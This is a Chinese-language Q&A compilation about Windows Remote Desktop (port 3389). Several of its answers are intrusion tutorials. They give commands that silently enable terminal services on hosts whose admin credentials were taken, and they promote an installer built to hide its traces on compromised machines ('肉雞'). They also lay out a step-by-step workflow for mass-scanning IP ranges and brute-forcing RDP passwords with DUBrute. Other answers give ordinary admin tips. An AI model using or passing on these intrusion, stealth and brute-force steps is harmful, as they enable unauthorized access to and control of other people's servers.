如何進入3389伺服器

① 怎麼開啟對方的3389埠

得到了一台主機的管理員許可權,但我們失望的發現這台主機並沒有安裝3389終端服務組件,
是不是有些懊喪呢?別急,下面我們一起來探索一下遠程開啟3389的方法.

首先我們應該了解3389終端服務,可以運行在什麼系統下,個人了解,終端服務在M$的大部分
產品中都可運行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要單獨購買的,2000專業版不能遠程安裝終端服務的,至少我沒成功過.
我們在以下的探索中,是以win2000server和高級server為例的.(現在用的也最多).

現在開始.

假設我們拿到了一個主機的管理員帳戶和密碼.
主機: 192.168.0.1
帳號: administrator
密碼: 7788
2000系統安裝在c:\winnt下

從上面的的介紹可以知道,2000專業版是不可以遠程安裝終端服務的,那我們就要首先來
判斷此主機是專業版還是伺服器版,才能進入下一個環節.

我們可以先用對方所開帳戶判斷:

c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users FORM server...
--------------------------
Total = 5
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 來賓帳號 )
num3= IWAM_servername (啟動 IIS 進程帳號)
num4= TsInternetUser (TsInternetUser)
--------------------------
Total = 5
--------------------------

一般情況num2/3/4這三個帳戶都是2000server默認開啟的.
2000專業版默認是不開這些帳戶的.

我們也可以掃描對方開放的埠進一步確認:
用掃描軟體如:superscan3.exe掃描對方所開埠
判斷對方是否開啟25,3372等2000server默認開啟的埠.

當然我們還可以使用一些工具,如:cmdinfo.zip
這2個東東可以獲得本地或遠程NT/2K主機的版本,系統路徑,源盤路徑,PACK版本,安裝時間等一
系列信息,一個圖形界面,一個命令行.
通過返回的信息就可以很清楚的了解對方主機情況.

還有一些其他的方法來判斷,如:從對方所開的服務來確定等,
從上面的判斷准確率還算高,別的就不一一說明了.

如果你在以上步驟里發現對方主機並沒有那3個帳戶,默認埠也沒開,
或cmdinfo返回的信息對方是2000專業版,你就要放棄安裝3389的計劃了.

現在我們要進入下一環節:
判斷終端服務到底有沒有安裝?

你也許要問:為什麼還要判斷啊?我掃描沒有發現3389埠啊?
這里就需要解釋一下,如果裝了終端服務組件,可能有哪幾種情況掃描不到3389埠?
1.終端服務termservice在"管理工具">>>"服務"中被禁用.
2.終端服務連接所需的RDP協議在"管理工具">>>"終端服務配置"中被停用連接.
3.終端服務默認連接埠3389被人為的改變.如何改變請看修改終端服務默認的3389埠(圖文)
4.終端服務綁定的網路適配器不是外網的.
5.防火牆和埠過濾之類的問題.
6.....(還有我沒想到的)
其實,我們遇到最多的情況就是以上5種情況.

現在開始判組件是否被安裝.

先與遠程主機連接,映射遠程主機C盤為本地Z盤
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
命令成功完成。

然後轉到Z盤,檢查
Z:\Documents and Settings\All Users\「開始」菜單\程序\管理工具>
里是否有 "終端服務管理器"和"終端服務配置"的快捷方式文件
如有已安裝服務組件的會有,反之,沒有(98% 人為故意刪的可能性較小)
我們還可以在下一步telnet到對方主機後使用終端服務自帶的命令進一步的核實.

判斷完畢,對方好像是沒有安裝終端服務組件,可以進入下一步:
telnet登陸對方主機,准備安裝服務組件.

在這里,我強烈建議使用2000自帶的telnet服務端登陸,
有回顯,不容易出錯.個人感覺使用它,一次成功的比例高很多.(呵呵~,個人理解啊!)
就算沒有開,打開用完後再關掉就完了.
.abu.寫的最快速登錄WIN2K TELNET 服務已經把這個方法介紹的非常詳細,
而且他的辦法(在本機建立同名,同密碼帳戶),讓快速實現telnet登陸成為現實.

假如我們已開啟對方23埠,
telnet 192.168.0.1
輸入用戶名/密碼
*===============================================================
歡迎使用 Microsoft Telnet 伺服器。
*===============================================================
C:\>
\\成功進入!!!!

進入後,再次檢查終端組件是否安裝:
c:\>query user
這個工具需要安裝終端服務.

這樣就進一步確定了組件沒有被安裝.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 運行中 . 2002-1-12 22:5
\\類似這樣的信息,可能組件就已安裝.

好!都清楚了,可以開始安裝了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //檢查INF文件的位置
c:\WINNT\inf 的目錄

2000-01-10 20:00 3,770 sysoc.inf
1 個文件 3,770 位元組
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //檢查組件安裝程序
c:\WINNT\system32 的目錄

2000-01-10 20:00 42,768 sysocmgr.exe
1 個文件 42,768 位元組
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//這是建立無人參與的安裝參數
c:\>type c:\wawa
[Components]
TSEnable = on
//檢查參數文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
這一條就是真正安裝組件的命令.
以上這條命令沒有加/R參數,主機在安裝完後自動重起.
如若加了/R參數主機就不會重起.

如果一切正常的話,幾分鍾後對方主機將會離線,當它重新回來時,
3389終端服務就已經開啟.你就可以連上去了.

問題和建議:

A 在安裝過程中,不使用/R,有時主機也不會重起,你就要手動重起他,但在使用諸如:iisreset /reboot命令時,對方
的屏幕會出現個對話框,寫著誰引起的這次啟動,離重起還有多少秒.

B 一次不行可以再試一次,在實際中很有作用.

C 在輸入sysocmgr命令開始安裝時,一定不要把命令參數輸錯,那會在對方出現一個大的對話框,是sysocmgr的幫助,很是顯眼,
而且要求確定.在你的屏幕上是不會有任何反應的,你不會知道出錯，所以會有B的建議.

不清楚行不行

② 如何登陸 3389 伺服器

開始…運行…裡面輸入mstsc回車 輸入你伺服器的ip 連接上課輸入用戶密碼即可

③ 我自己的伺服器，需要打開3389埠怎麼弄WIN2003

我的電腦，屬性，遠程，選擇「允許用戶遠程連接到此計算機」，然後控制面板，windows防火牆例外「遠程桌面」，或手動添加埠3389

④ 怎麼樣設置網站的3389伺服器連接

你是指用網站域名連接還是直接是ip連接
或者是指這網站伺服器開啟遠程連接的方法？
前者的話開啟3389功能直接用域名跟ip都可以直接連接
後者的話需要登錄伺服器在裡面開啟3389功能

⑤ 怎麼打開3389埠和相應的服務

怎麼樣開3389埠，這里我把他們總結一下，網上查到的，很全面,希望對你有用:
1，打開記事本，編輯內容如下：
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好後存為BAT文件，上傳至肉雞，執行。這里值得注意的是要確定winnt是否在c盤，如果在其他盤則需要改動。

2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
使用方法：
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本，例如：

c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務埠] [自動重起選項]

服務埠： 設置終端服務的服務埠。默認是3389。
自動重起選項： 使用/r表示安裝完成後自動重起目標使設置生效。
使用/fr表示強制重起目標。（如果/r不行，可以試試這個）
使用此參數時，埠設置不能忽略。

比如掃描到了一個有NT弱口令的伺服器，IP地址是222.222.222.222，管理員帳戶是administrator，密碼為空
運行CMD（2000下的DOS），我們給它開終端！
命令如下！
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧？cscript reg.vbe這是命令，後面的是IP，然後是管理員帳戶，接這是密碼，因為222.222.222.222 這台伺服器的管理員密碼是空的，那就用雙引號表示為空，再後面是埠，你可以任意設置終端的埠，/fr是重啟命令（強制重啟，一般我都用這個，你也可以/r，這是普通重啟）

腳本會判斷目標系統類型，如果不是server及以上版本，就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤，就繼續安裝好了。

如果要對本地使用，IP地址為127.0.0.1或者一個點（用.表示），用戶名和密碼都為空（用""表示）。

腳本訪問的目標的135埠，如果目標135埠未開放，或者WMI服務關閉，那麼腳本就沒用了。

3，下載3389自動安裝程序-djshao正式版5.0
說明：
解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下，然後進入c:\winnt\temp目錄執行djxyxs.exe解壓縮文件，然後再執行解壓縮出來的azzd.exe文件，等一會肉雞會自動重啟！重啟後會出現終端服務！

特點：1、不用修改注冊表的安裝路徑，注冊表會自動修改，安裝完後會自動恢復到原來的安裝路徑，2、在後台安靜模式運行，就算肉雞旁有人也沒有關系！3、在添加和刪除中看不出終端服務被安裝的痕跡，也就是啟動終端前不會打鉤，4、不會在肉雞上留下你的上傳文件，在安裝完終端服務後會會自動刪除你上傳到c:\winnt\temp下的任何文件！5、不管肉雞的winnt裝在什麼盤上都無所謂！6、安裝完終端後會刪除在管理工具中的終端快捷圖標！7、在沒有安裝終端前，終端服務是被禁止的！安裝終端後，終端服務被改為自動！但是如果在安裝前終端服務是手動！安裝後就可能還是手動！等重啟後就不會打開服務！所以在軟體中加了sc指令，等安裝完後，不管終端服務是禁止還是手動還是自動，全部改為自動。8、自動檢測肉雞是不是伺服器版，如果不是刪除原文件，不執行安裝，如果是伺服器版就執行安裝！9、支持中日韓繁四個版本的win2000伺服器版！

5，下載DameWare NT Utilities 3.66.0.0 注冊版
安裝注冊完畢後輸入對方IP用戶名密碼，等待出現是否安裝的對話框點是。
復制啟動後出現對方桌面。
在對方桌面進入控制面版，點添加或刪除程序。進入後點添加/刪除windows組件，找到終端服務，點際進入後在啟動終端服務上打上勾。確定自動提示重起，重起後OK

⑥ 如何利用3389埠攻破伺服器

第一步：使用工具Dubrute中的Ipseacher進行搜索一些活躍的IP段，當然也會採用網路搜索的方法進行；接著就採用SYN掃描為了達到好的效果都會在server2003系統下進行掃描，只有在該系統下不能正常掃描的時候才會使用vmware虛擬機進行掃描；另外如果在XP系統下進行掃描的時候，他們往往會讓先讓XP能支持SYN的掃描，方法就是將支持這種掃描的補丁直接復制粘貼到系統盤下的driver，當電腦進行重啟後就能進行掃描了。
第二步：將Ipseach下的IP段進行直接復制到SYN掃描器下的ip.txt中，當進行掃描一段時間後就能生出ips文檔而這種ips文檔IP事實上就是用戶開啟3389埠的實際IP；順便業內專家也將brute工具中的英文操作給大家翻譯下，能夠幫助大家更好進行理解；source代表就為源、bad代表的酒味壞的、good代表的就是好的、error代表的就是錯誤的、check代表的就是檢測、thread代表的就是線程、start代表的就是開始、config代表的就是配置、generation代表的就是生成、about代表的就是關於。
第三步：將直接導入需要攻破的3389IP地址，接著還會打開generation在打開後就能看到有3列需要進行手動輸入的框，在第一列框中手動填寫的就是需要攻破的伺服器IP，而第二列框中填寫的就是相關登陸賬號一般就是administrator，在第三列中就是導入的3389密碼字典，當點擊male退出界面後，就能再點擊config進行配置了。
第四步：當全部完成後就能點擊start進行攻破了，這個時候在good後就會出現相關數字這就能代表攻破了多少數量的伺服器，界面中的bad就代表正在check中當在brute下找到good文檔進行打開，就能輕松查看到攻破伺服器的登錄賬號和密碼了。
第五步：依次點擊電腦開始—運行項目，並在彈出框內輸入mstsc-admin指令就能順利進入3389登陸框，當輸入IP連接上再輸入賬號密碼就能直接登錄成功了。

⑦ 如何通過3389進入我的伺服器

3389要想傳文件那可費勁了。還是用吧。埠21
3389登陸器xp自帶，在運行輸入mstsc

⑧ 不小心禁掉了雲伺服器3389埠，怎麼遠程打開

伺服器裝了殺軟以後3389被關閉了。我又不想插顯示器，怎麼辦呢。因為我知道用戶名密碼就想到了ipc$下面是詳細過程
1.用ipc$連接伺服器
net use \\192.168.150.90\ipc$ "password" /user:"administrator"
成功以後進行第二步
2.連接遠程注冊表准備開啟遠程伺服器的3389埠
打開本機注冊表
"開始"==>"運行"==>regedit
在"注冊表"下拉菜單中選擇"連接網路注冊表"
在"計算機名"中輸入 \\192.168.150.90
這樣就進入了遠程主機注冊表.
把[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\]
"fDenyTSConnections"=dword:00000001
改成"fDenyTSConnections"=dword:00000000
如果連接遠程注冊表的時候報錯「 法連接192.168.150.90，請確定該機在網路上，其遠程管理程序已被啟用，並且兩台計算機使用統一注冊表服務」的話請轉第三步
3.如果報第二步的錯誤，是 為遠程主機的remote registry這個服務沒有打開。如何打開呢

右擊我的電腦--管理---右擊-----》計算機管理（本地）----連接到另一台計算機---輸入192.168.150.90.連接上之後我們就可以開啟150.90這台伺服器的remote registry服務了，然後我們再按照第二步的辦法就可以成功打開這台伺服器的遠程桌面了。
是不是很簡單呢?
不懂得話可以聯系tjyundingyun